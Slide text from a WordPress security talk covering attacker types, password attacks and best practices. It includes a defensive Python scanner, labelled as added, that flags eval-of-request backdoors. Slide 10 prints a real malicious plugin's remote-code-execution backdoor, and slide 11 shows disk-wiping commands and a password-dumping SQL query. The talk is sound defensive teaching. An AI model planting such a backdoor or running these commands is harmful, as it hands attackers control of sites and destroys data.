Intro to Wordpress Security

A brief overview of security concepts to give context to the threats facing Wordpress users.

  1. Intro to Wordpress Security. Prepared for the Oklahoma City Wordpress User Group by Chris Dodds.
  2. Chris Dodds, Owner & Principal Advisor at Focusfire IT Strategy & Consulting.
     Features: Ten+ years of experience across multiple industries and IT disciplines.
     Certifications: CISSP, MCITP:SA, Security+, Network+.
     System Requirements: Food, water, & internet connectivity.
  3. This talk is not about the top 5 WP security threats.
  4. Let's talk about Betty.
  5. Betty's Fancy Blog o' Gnomes (diagram: Betty's Fancy Server, Betty's Fancy Employer, Betty's Fancy Audience).
  6. It's not about you, Betty.
  7. The Players: Script kiddies, Hacktivists, Pro Criminals, Information Warriors.
  8. Enumeration, Access, Exploitation.
  9. Password Attacks: exploit weak passwords; dictionary based; can be entirely automated.
  10. ToolsPack Plugin (toolspack.php):

         <?php
         /*
         Plugin Name: ToolsPack
         Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
         Version: 1.2
         Author: Mark Stain
         Author URI: http://checkWPTools.com/
         */
         $_REQUEST[e] ? EVAL( base64_decode( $_REQUEST[e] ) ) : exit;
         ?>

      Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
  11. This backdoor code allows the remote user to:
      Execute commands on your server: $WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`;
      Execute commands against your WP database: SELECT login + - + password FROM users
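As an added defensive example (not part of the talk), the scanner below walks a plugin directory and flags the eval-of-a-request-parameter pattern the ToolsPack backdoor uses; the two plugin sources it checks are constructed samples, and the directory layout is assumed to mirror wp-content/plugins.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample: the executable part of the ToolsPack backdoor shown in the talk.
BACKDOOR_SAMPLE = """<?php
/* Plugin Name: ToolsPack */
$_REQUEST[e] ? EVAL( base64_decode( $_REQUEST[e] ) ) : exit;
?>"""

# Constructed sample: a harmless plugin that must not be flagged.
BENIGN_SAMPLE = """<?php
/* Plugin Name: Hello Example */
function hello_example() { echo 'Hello'; }
?>"""

# Code that evaluates decoded or request-supplied input; eval() is matched
# case-insensitively because PHP function names are, and the sample uses EVAL.
PATTERNS = [
    re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.IGNORECASE),
    re.compile(r"\beval\s*\(.*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.IGNORECASE),
    re.compile(r"base64_decode\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.IGNORECASE),
]


def scan_source(source, name="<string>"):
    """Return (name, line number, pattern) for each line matching a backdoor pattern."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for pat in PATTERNS:
            if pat.search(line):
                hits.append((name, lineno, pat.pattern))
                break  # one finding per line is enough
    return hits


def scan_plugin_dir(root):
    """Scan every .php file under root (e.g. wp-content/plugins) and collect findings."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        findings.extend(scan_source(path.read_text(errors="replace"), rel))
    return findings


def demo_scan():
    """Write both constructed samples into a temporary plugin tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "toolspack").mkdir()
        (root / "toolspack" / "toolspack.php").write_text(BACKDOOR_SAMPLE)
        (root / "hello").mkdir()
        (root / "hello" / "hello.php").write_text(BENIGN_SAMPLE)
        return scan_plugin_dir(root)
```

Point scan_plugin_dir at a real wp-content/plugins copy to review every hit by hand; a match is a reason to inspect the file, not proof of compromise on its own.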
  12. More Likely...
      Payload - keylogger, trojan, spyware, virus.
      SEO Spam - links, keywords: "garden gnomes, free chaps, leather sale, cheap sex, porn, prescription drugs, coupons, free avon".
  13. Best Practices:
      Update! Update! Update!
      Backup & test your backups.
      Use a unique passphrase.
      Don't use the "admin" user.
      Disable or delete un-used plugins.
  14. These are all things your attacker will do once they control your site.
  15. Recommended Plugins:
      Backup: BackWPup - open-source, or BackupBuddy - commercial.
      Security: Better WP Security - open-source; Limit Login Attempts - open-source; Sucuri SiteCheck Scanner - http://sitecheck.sucuri.net/
  16. Contact and Q&A: Chris Dodds
      e-mail - chris.dodds@focusfire.net
      twitter - @doddschris
      web - chrisdodds.net
